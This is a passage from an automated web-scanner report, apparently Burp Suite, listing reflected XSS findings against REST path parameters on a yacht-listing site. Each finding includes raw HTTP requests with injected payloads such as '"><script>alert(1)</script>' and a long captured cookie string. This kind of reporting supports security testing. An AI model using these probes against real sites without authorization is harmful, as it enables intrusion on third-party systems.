The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff1c8"><a>b6a2c930dea was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/category/type/Cruisersff1c8"><a>b6a2c930dea/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:53:07 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type/Cruisersff1c8"><a>b6a2c930dea/A-1">
...[SNIP]...

3.229. http://www.yachtworld.com/boats/category/type/Cruisers/1 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Cruisers/1

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cda34"><script>alert(1)</script>30daa26db3e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/category/type/Cruisers/1cda34"><script>alert(1)</script>30daa26db3e HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:53:16 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type/Cruisers/1cda34"><script>alert(1)</script>30daa26db3e/A-1">
...[SNIP]...

3.230. http://www.yachtworld.com/boats/category/type/Formula/1 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Formula/1

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20a31"><a>1a2df65a28b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/category/type20a31"><a>1a2df65a28b/Formula/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:52:40 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a class="navFirst" href="/boats/category/type20a31"><a>1a2df65a28b/Formula/1">
...[SNIP]...

3.231. http://www.yachtworld.com/boats/category/type/Formula/1 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Formula/1

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40598"><a>196174be55b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/category/type/Formula40598"><a>196174be55b/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:52:50 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type/Formula40598"><a>196174be55b/A-1">
...[SNIP]...

3.232. http://www.yachtworld.com/boats/category/type/Formula/1 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Formula/1

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acaf2"><script>alert(1)</script>c7c84a6c04c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/category/type/Formula/1acaf2"><script>alert(1)</script>c7c84a6c04c HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:53:01 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type/Formula/1acaf2"><script>alert(1)</script>c7c84a6c04c/A-1">
...[SNIP]...

3.233. http://www.yachtworld.com/boats/category/type/Four+Winns/1 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Four+Winns/1

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e177"><script>alert(1)</script>960cd3935d4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/category/type2e177"><script>alert(1)</script>960cd3935d4/Four+Winns/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
